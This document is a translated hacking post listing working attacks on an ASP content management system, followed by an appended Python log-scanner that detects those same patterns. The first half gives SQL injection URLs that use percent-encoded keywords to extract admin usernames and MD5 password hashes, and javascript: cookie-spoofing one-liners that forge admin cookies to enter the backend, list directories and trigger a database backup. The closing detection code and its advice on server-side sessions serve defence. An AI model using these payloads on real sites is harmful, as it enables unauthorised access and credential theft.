I. Injection
1. news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2. Step 1: javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
Step 2: request: admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
This yields the username and the MD5-hashed password.
II. Cookie spoofing
1. Go straight into the admin backend. Works on older versions; generally the versions where login.asp and admin_index.asp sit in the same directory have this flaw.
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
2. List directories.
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
3. Database backup (applicability seems rather low).
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
4. How to get into the backend when the MD5 password you obtained cannot be cracked
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"
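The two request patterns in this post (percent-encoded SQL keywords such as %41nd / %53elect in the query string, and 'or'='or' values pushed through the adminuser / adminpass cookies) are easy to pick out of web server logs once each request is normalized. The Python detection helper below is an added example and is not part of the original post; the log line format, the ASPSESSIONID cookie and the sample lines are constructed for the demo.

```python
"""Log-side detection for the two patterns described above:
percent-encoded SQL keywords in a query string, and quoted
OR/AND tautologies smuggled in through cookie values.
Constructed example; the log format and sample lines are made up."""
import re
from urllib.parse import unquote

# A letter that was percent-encoded although it never needed to be
# (%41 = 'A', %53 = 'S', %46 = 'F').  Browsers do not emit this for
# plain letters; it is the classic way past a naive keyword blacklist.
ENCODED_LETTER = re.compile(r"%(?:4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a])", re.I)

# SQL shapes, matched on the *decoded*, lower-cased, space-collapsed target.
SQL_PATTERNS = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "tautology":    re.compile(r"\b(?:and|or)\b\s*\d+\s*=\s*\d+"),
    "hex_literal":  re.compile(r"\b0x[0-9a-f]{2,}\b"),
}

# 'or'='or' style value inside a cookie, checked after percent-decoding.
COOKIE_TAUTOLOGY = re.compile(r"'\s*(?:or|and)\s*'\s*=\s*'", re.I)


def normalize(raw: str) -> str:
    """Percent-decode until stable (catches double encoding), lower-case,
    collapse whitespace.  Matching runs on this form, not on the raw URL."""
    s = raw
    for _ in range(3):                  # bounded: never loop on hostile input
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"\s+", " ", s).lower()


def inspect_request(path_and_query: str) -> list[str]:
    """Return the indicator names that fire on one request target."""
    hits = []
    if ENCODED_LETTER.search(path_and_query):
        hits.append("encoded_letter_obfuscation")
    norm = normalize(path_and_query)
    for name, pat in SQL_PATTERNS.items():
        if pat.search(norm):
            hits.append(name)
    return hits


def inspect_cookies(cookie_header: str) -> list[str]:
    """Return 'tautology:<cookie name>' for every cookie whose decoded
    value looks like a quoted OR/AND tautology."""
    hits = []
    for part in cookie_header.split(";"):
        if "=" not in part:
            continue
        name, _, value = part.strip().partition("=")
        if COOKIE_TAUTOLOGY.search(unquote(value)):
            hits.append(f"tautology:{name}")
    return hits


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Lines are 'METHOD TARGET | cookie-header' (constructed format).
    Returns (target, indicators) only for lines with at least one hit."""
    findings = []
    for line in lines:
        req, _, cookies = line.partition(" | ")
        target = req.split(" ", 1)[1] if " " in req else req
        hits = inspect_request(target) + inspect_cookies(cookies)
        if hits:
            findings.append((target, hits))
    return findings


# Constructed sample traffic: two benign requests and one of each pattern.
SAMPLE_LOG = [
    "GET /news_more.asp?lm=2 | ASPSESSIONID=abc123",
    "GET /news_more.asp?lm=2%20%41nd%201=2%20union%20%53elect%201,2,0x3b | ASPSESSIONID=abc123",
    "GET /admin_index.asp | adminuser=%27or%27%3D%27or%27; adminpass=%27or%27%3D%27or%27; admindj=1",
    "GET /edit/admin_uploadfile.asp?dir=img | ASPSESSIONID=def456; admindj=1",
]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print(target, "->", ", ".join(hits))
```

The decisive signal is the encoded-letter check: legitimate clients never percent-encode plain ASCII letters, so %41nd in a query string is suspicious on its own, independent of which keyword it hides. The cookie check only catches the tautology variant; the admindj=1 and replayed-MD5 variants in the post are indistinguishable from legitimate traffic at the log level, which is exactly why a server must derive admin state from a server-side session rather than from a client-supplied cookie.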